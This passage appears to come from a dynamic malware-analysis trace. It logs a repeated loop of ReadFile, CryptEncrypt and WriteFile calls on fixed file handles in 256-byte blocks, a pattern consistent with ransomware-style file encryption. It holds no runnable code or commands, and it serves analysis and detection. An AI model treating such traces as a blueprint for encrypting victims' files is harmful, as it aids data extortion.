lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.293] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.293] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.293] GetLastError () returned 0x0 [0168.293] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.293] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.293] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.293] GetLastError () returned 0x0 [0168.293] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.294] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.294] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.294] GetLastError () returned 0x0 [0168.294] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.294] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.294] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.294] GetLastError () returned 0x0 [0168.294] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.294] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.294] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.294] GetLastError () returned 0x0 [0168.294] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.294] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.294] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.294] GetLastError () returned 0x0 [0168.294] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.294] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.294] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.294] GetLastError () returned 0x0 [0168.294] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.294] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.294] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.294] GetLastError () returned 0x0 [0168.294] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.294] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.295] GetLastError () returned 0x0 [0168.295] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.295] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.295] GetLastError () returned 0x0 [0168.295] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.295] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.295] GetLastError () returned 0x0 [0168.295] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.295] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.295] GetLastError () returned 0x0 [0168.295] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.295] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.295] GetLastError () returned 0x0 [0168.295] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.295] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.295] GetLastError () returned 0x0 [0168.295] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.295] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.295] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.295] GetLastError () returned 0x0 [0168.296] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.296] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.296] GetLastError () returned 0x0 [0168.296] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.296] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.296] GetLastError () returned 0x0 [0168.296] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.296] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.296] GetLastError () returned 0x0 [0168.296] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.296] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.296] GetLastError () returned 0x0 [0168.296] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.296] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.296] GetLastError () returned 0x0 [0168.296] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.296] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.296] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.296] GetLastError () returned 0x0 [0168.296] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.296] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.297] GetLastError () returned 0x0 [0168.297] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.297] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.297] GetLastError () returned 0x0 [0168.297] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.297] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.297] GetLastError () returned 0x0 [0168.297] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.297] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.297] GetLastError () returned 0x0 [0168.297] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.297] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.297] GetLastError () returned 0x0 [0168.297] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.297] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.297] GetLastError () returned 0x0 [0168.297] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.297] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.297] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.298] GetLastError () returned 0x0 [0168.298] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.298] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.298] GetLastError () returned 0x0 [0168.298] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.298] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.298] GetLastError () returned 0x0 [0168.298] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.298] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.298] GetLastError () returned 0x0 [0168.298] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.298] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.298] GetLastError () returned 0x0 [0168.298] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, 